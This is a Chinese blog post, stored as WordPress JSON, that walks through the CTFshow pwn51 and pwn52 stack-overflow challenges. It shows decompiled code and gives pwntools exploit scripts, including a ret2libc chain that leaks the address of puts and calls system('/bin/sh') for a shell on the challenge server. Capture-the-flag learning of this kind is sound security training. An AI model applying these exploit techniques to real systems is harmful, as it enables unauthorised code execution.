{"id":281,"date":"2025-02-21T15:41:52","date_gmt":"2025-02-21T07:41:52","guid":{"rendered":"https:\/\/www.okabe.xin\/?p=281"},"modified":"2025-02-21T15:41:52","modified_gmt":"2025-02-21T07:41:52","slug":"281","status":"publish","type":"post","link":"https:\/\/www.okabe.xin\/wordpress\/?p=281","title":{"rendered":"\u9752\u6625\u732a\u5934\u5c11\u5e74\u4e0d\u4f1apwn\u6389\u5154\u5973\u90ce"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">pwn51<\/h2>\n\n\n\n<p>32\u4f4d<\/p>\n\n\n\n<p>\u53cd\u7f16\u8bd1\u540e\u50bb\u773c\u4e86<\/p>\n\n\n\n<p>\u662fC++<\/p>\n\n\n\n<p>\u770b\u4e0d\u592a\u61c2\uff0c\u9760\u7740string\u754c\u9762\u627e\u5230\u4e86\u4e3b\u8981\u51fd\u6570sub_8049059<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>int sub_8049059()<br>{<br> &nbsp;int v0; \/\/ eax<br> &nbsp;int v1; \/\/ eax<br> &nbsp;unsigned int v2; \/\/ eax<br> &nbsp;int v3; \/\/ eax<br> &nbsp;const char *v4; \/\/ eax<br> &nbsp;int v6; \/\/ &#91;esp-Ch] &#91;ebp-84h]<br> &nbsp;int v7; \/\/ &#91;esp-8h] &#91;ebp-80h]<br> &nbsp;_BYTE v8&#91;12]; \/\/ &#91;esp+0h] &#91;ebp-78h] BYREF<br> &nbsp;char s&#91;32]; \/\/ &#91;esp+Ch] &#91;ebp-6Ch] BYREF<br> &nbsp;_BYTE v10&#91;24]; \/\/ &#91;esp+2Ch] &#91;ebp-4Ch] BYREF<br> &nbsp;_BYTE v11&#91;24]; \/\/ &#91;esp+44h] &#91;ebp-34h] BYREF<br> &nbsp;unsigned int i; \/\/ &#91;esp+5Ch] &#91;ebp-1Ch]<br>\u200b<br> &nbsp;memset(s, 0, sizeof(s));<br> &nbsp;puts(\"Who are you?\");<br> &nbsp;read(0, s, 0x20u);<br> &nbsp;std::string::operator=(&amp;unk_804D0A0, &amp;unk_804A350);<br> &nbsp;std::string::operator+=(&amp;unk_804D0A0, s);<br> &nbsp;std::string::basic_string(v10, &amp;unk_804D0B8);<br> &nbsp;std::string::basic_string(v11, &amp;unk_804D0A0);<br> &nbsp;sub_8048F06(v8);<br> &nbsp;std::string::~string(v11, v11, v10);<br> &nbsp;std::string::~string(v10, v6, v7);<br> &nbsp;if ( sub_80496D6(v8) &gt; 1u )<br>  {<br> &nbsp; &nbsp;std::string::operator=(&amp;unk_804D0A0, &amp;unk_804A350);<br> &nbsp; &nbsp;v0 = sub_8049700(v8, 0);<br> &nbsp; &nbsp;if ( (unsigned __int8)sub_8049722(v0, &amp;unk_804A350) )<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;v1 = sub_8049700(v8, 0);<br> &nbsp; &nbsp; &nbsp;std::string::operator+=(&amp;unk_804D0A0, v1);<br> &nbsp;  }<br> &nbsp; &nbsp;for ( i = 1; ; ++i )<br> &nbsp;  {<br> &nbsp; &nbsp; &nbsp;v2 = sub_80496D6(v8);<br> &nbsp; &nbsp; &nbsp;if ( v2 &lt;= i )<br> &nbsp; &nbsp; &nbsp; &nbsp;break;<br> &nbsp; &nbsp; &nbsp;std::string::operator+=(&amp;unk_804D0A0, \"IronMan\");<br> &nbsp; &nbsp; &nbsp;v3 = sub_8049700(v8, i);<br> &nbsp; &nbsp; &nbsp;std::string::operator+=(&amp;unk_804D0A0, v3);<br> &nbsp;  }<br>  }<br> &nbsp;v4 = (const char *)std::string::c_str(&amp;unk_804D0A0);<br> &nbsp;strcpy(s, v4);<br> &nbsp;printf(\"Wow!you are:%s\", s);<br> &nbsp;return sub_8049616(v8);<br>}<\/code><\/pre>\n\n\n\n<p>\u521d\u7565\u7406\u89e3\u4e4b\u4e0b\uff0c\u77e5\u9053s\u5c31\u662f\u8981\u6ea2\u51fa\u7684\u5bf9\u8c61\uff0c\u8ba4\u4e3a\u504f\u79fb\u503c\u5c31\u662fchar s[32]; \/\/ [esp+Ch] [ebp-6Ch] BYREF\uff0c\u4e5f\u5c31\u662f0x6C+4<\/p>\n\n\n\n<p>string\u754c\u9762\u8fd8\u80fd\u627e\u5230\u4e00\u6761system\u6307\u4ee4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>int sub_804902E()<br>{<br> &nbsp;return system(\"cat \/ctfshow_flag\");<br>}<\/code><\/pre>\n\n\n\n<p>\u521d\u6b65\u5c1d\u8bd5\u5931\u8d25\uff0c\u867d\u7136\u770b\u7740\u5e94\u8be5\u6ca1\u4ec0\u4e48\u95ee\u9898<\/p>\n\n\n\n<p>\u4f46\u662f\u8c8c\u4f3c\u6709\u9650\u5236\u8f93\u5165<\/p>\n\n\n\n<p>\u6240\u4ee5\u5c1d\u8bd5\u8f93\u51650x6C+4\u7684\u2018a\u2019\u5c31\u6ca1\u529e\u6cd5\u8f93\u51fa\u591f<\/p>\n\n\n\n<p>\u770bWP\u624d\u77e5\u9053\u4e3b\u51fd\u6570\u91cc\u9762\u4f1a\u628aI\u6362\u6210IronMan<\/p>\n\n\n\n<p>16\u4e2aI\u7684\u8f93\u5165\u5c31\u80fd\u521a\u521a\u597d\u53d8\u6210112\u5b57\u8282IronMan\uff0c\u5b8c\u6210\u6ea2\u51fa\u6548\u679c<\/p>\n\n\n\n<p>\u7136\u540e\u540e\u7eed\u8ddf\u4e00\u4e2asystem\u51fd\u6570\u4f4d\u7f6e\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>u=remote(\"pwn.challenge.ctf.show\",28223)<br>payload=b'I'*16+p32(0x0804902E)<br>#payload=b'I'*16+p32(0x08049042)<br>u.sendline(payload)<br>u.interactive()<\/code><\/pre>\n\n\n\n<p>\u6b64\u4e8b\u5728\u76f4\u63a5\u672c\u5730\u8fd0\u884c\u4ea6\u6709\u8bb0\u8f7d\uff08<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>ctfshow@ubuntu:~\/Desktop\/xd\/LibcSearcher$ .\/pwn51<br> &nbsp; &nbsp;\u2584\u2584\u2584\u2584 &nbsp; \u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 &nbsp;\u2584\u2584\u2584\u2584\u2584\u2584\u2584\u2584 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\u2584\u2584 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp;\u2588\u2588\u2580\u2580\u2580\u2580\u2588 &nbsp;\u2580\u2580\u2580\u2588\u2588\u2580\u2580\u2580 &nbsp;\u2588\u2588\u2580\u2580\u2580\u2580\u2580\u2580 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\u2588\u2588 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> \u2588\u2588\u2580 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\u2588\u2588 &nbsp; &nbsp; \u2588\u2588 &nbsp; &nbsp; &nbsp; &nbsp;\u2584\u2584\u2588\u2588\u2588\u2588\u2588\u2584 &nbsp;\u2588\u2588\u2584\u2588\u2588\u2588\u2588\u2584 &nbsp; \u2584\u2588\u2588\u2588\u2588\u2584 &nbsp;\u2588\u2588 &nbsp; &nbsp; &nbsp;\u2588\u2588<br> \u2588\u2588 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; \u2588\u2588 &nbsp; &nbsp; \u2588\u2588\u2588\u2588\u2588\u2588\u2588 &nbsp; \u2588\u2588\u2584\u2584\u2584\u2584 \u2580 &nbsp;\u2588\u2588\u2580 &nbsp; \u2588\u2588 &nbsp;\u2588\u2588\u2580 &nbsp;\u2580\u2588\u2588 \u2580\u2588 &nbsp;\u2588\u2588 &nbsp;\u2588\u2580<br> \u2588\u2588\u2584 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;\u2588\u2588 &nbsp; &nbsp; \u2588\u2588 &nbsp; &nbsp; &nbsp; &nbsp; \u2580\u2580\u2580\u2580\u2588\u2588\u2584 &nbsp;\u2588\u2588 &nbsp; &nbsp;\u2588\u2588 &nbsp;\u2588\u2588 &nbsp; &nbsp;\u2588\u2588 &nbsp;\u2588\u2588\u2584\u2588\u2588\u2584\u2588\u2588 <br> &nbsp;\u2588\u2588\u2584\u2584\u2584\u2584\u2588 &nbsp; &nbsp; \u2588\u2588 &nbsp; &nbsp; \u2588\u2588 &nbsp; &nbsp; &nbsp; &nbsp;\u2588\u2584\u2584\u2584\u2584\u2584\u2588\u2588 &nbsp;\u2588\u2588 &nbsp; &nbsp;\u2588\u2588 &nbsp;\u2580\u2588\u2588\u2584\u2584\u2588\u2588\u2580 &nbsp;\u2580\u2588\u2588 &nbsp;\u2588\u2588\u2580 <br> &nbsp; &nbsp;\u2580\u2580\u2580\u2580 &nbsp; &nbsp; &nbsp;\u2580\u2580 &nbsp; &nbsp; \u2580\u2580 &nbsp; &nbsp; &nbsp; &nbsp; \u2580\u2580\u2580\u2580\u2580\u2580 &nbsp; \u2580\u2580 &nbsp; &nbsp;\u2580\u2580 &nbsp; &nbsp;\u2580\u2580\u2580\u2580 &nbsp; &nbsp; \u2580\u2580 &nbsp;\u2580\u2580 &nbsp;<br> &nbsp; &nbsp;* ************************************* &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp; &nbsp;* Classify: CTFshow --- PWN --- \u5165\u95e8 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;* Type  : Stack_Overflow &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;* Site  : https:\/\/ctf.show\/ &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br> &nbsp; &nbsp;* Hint  : Who are you? &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<br> &nbsp; &nbsp;* ************************************* &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br>Who are you?<br>I<br>Wow!you are:IronMan<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">pwn52<\/h2>\n\n\n\n<p>flag\u51fd\u6570<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>char *__cdecl flag(int a1, int a2)<br>{<br> &nbsp;char *result; \/\/ eax<br> &nbsp;char s&#91;64]; \/\/ &#91;esp+Ch] &#91;ebp-4Ch] BYREF<br> &nbsp;FILE *stream; \/\/ &#91;esp+4Ch] &#91;ebp-Ch]<br>\u200b<br> &nbsp;stream = fopen(\"\/ctfshow_flag\", \"r\");<br> &nbsp;if ( !stream )<br>  {<br> &nbsp; &nbsp;puts(\"\/ctfshow_flag: No such file or directory.\");<br> &nbsp; &nbsp;exit(0);<br>  }<br> &nbsp;result = fgets(s, 64, stream);<br> &nbsp;if ( a1 == 876 &amp;&amp; a2 == 877 )<br> &nbsp; &nbsp;return (char *)printf(s);<br> &nbsp;return result;<br>}<\/code><\/pre>\n\n\n\n<p>\u521d\u7565\u7406\u89e3\u540e\uff0c\u5927\u610f\u4e3a\u4f20\u5165\u53c2\u6570a1,a2\u4e3a\u5bf9\u5e94\u503c<\/p>\n\n\n\n<p>\u5c31\u53ef\u4ee5\u8f93\u51fa\u6570\u7ec4s\u7684\u5185\u5bb9<\/p>\n\n\n\n<p>\u800c\u6570\u7ec4s\u8bfb\u53d6\u4e86stream\u7684\u524d64\u5b57\u8282\u7684\u5185\u5bb9<\/p>\n\n\n\n<p>stream\u53c8\u662f\u4f9d\u9760\u53ea\u8bfb\u6253\u5f00\u7684ctfshow_flag\u7684\u5185\u5bb9<\/p>\n\n\n\n<p>\u6240\u4ee5\u62ff\u5230\u6570\u7ec4S\u5c31\u662f\u62ff\u5230\u76ee\u6807flag<\/p>\n\n\n\n<p>\u627eflag\u51fd\u6570\u5730\u5740<\/p>\n\n\n\n<p>\u518d\u627e\u5230\u504f\u79fb\u91cf<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>u=remote(\"pwn.challenge.ctf.show\",28231)<br>offset = 0x6C<br>flag = 0x08048586<br>payload=b'a'*(offset+4)+p32(flag)+p32(0)+p32(876)+p32(877)<br>u.sendline(payload)<br>u.interactive()<\/code><\/pre>\n\n\n\n<p>\u8fd8\u53ef\u4ee5\u7528ret2libc\u505a\uff0c\u5b58\u5728puts\u51fd\u6570\uff0c\u5957\u677f\u5b50\u5c31\u80fd\u51fa<\/p>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>from LibcSearcher import *<br>\u200b<br>io = remote('pwn.challenge.ctf.show', 28188)<br># io = process(\"\")<br>elf = ELF('.\/pwn52')<br># libc= ELF('libc.so.6')<br>\u200b<br>main_add =0x0804874E<br>puts_got = elf.got&#91;'puts']<br>puts_plt = elf.plt&#91;'puts']<br>\u200b<br>print(\"Puts_got: \", hex(puts_got))<br>print(\"Puts_plt: \", hex(puts_plt))<br>\u200b<br>offset =0x6C<br>\u200b<br>payload1 = b'a' * (offset + 4) + p32(puts_plt) + p32(main_add) + p32(puts_got)<br>io.sendlineafter(b'What do you want?', payload1)<br>puts_addr = u32(io.recvuntil(b'\\xf7')&#91;-4:])<br>print(\"Puts_addr: \", hex(puts_addr))<br>\u200b<br>libc = LibcSearcher('puts', puts_addr)<br>\u200b<br>libc_base = puts_addr - libc.dump('puts')<br>system_add = libc_base + libc.dump('system')<br>bin_sh_add = libc_base + libc.dump('str_bin_sh')<br>\u200b<br># libc_base = puts_addr - libc.symbols&#91;'puts']<br># system_add = libc_base + libc.symbols&#91;'system']<br># bin_sh_add = libc_base + next(libc.search(b'\/bin\/sh'))<br>\u200b<br>payload2 = b'a' * (offset + 4) + p32(system_add) + p32(0) + p32(bin_sh_add)<br>io.sendlineafter(b'What do you want?', payload2)<br>\u200b<br>io.interactive()<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>pwn51 32\u4f4d \u53cd\u7f16\u8bd1\u540e\u50bb\u773c\u4e86 \u662fC++ \u770b\u4e0d\u592a\u61c2\uff0c\u9760\u7740string\u754c\u9762\u627e\u5230\u4e86\u4e3b\u8981\u51fd\u6570sub_804905 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[],"class_list":["post-281","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/281","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=281"}],"version-history":[{"count":0,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=\/wp\/v2\/posts\/281\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=281"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=281"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.okabe.xin\/wordpress\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=281"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}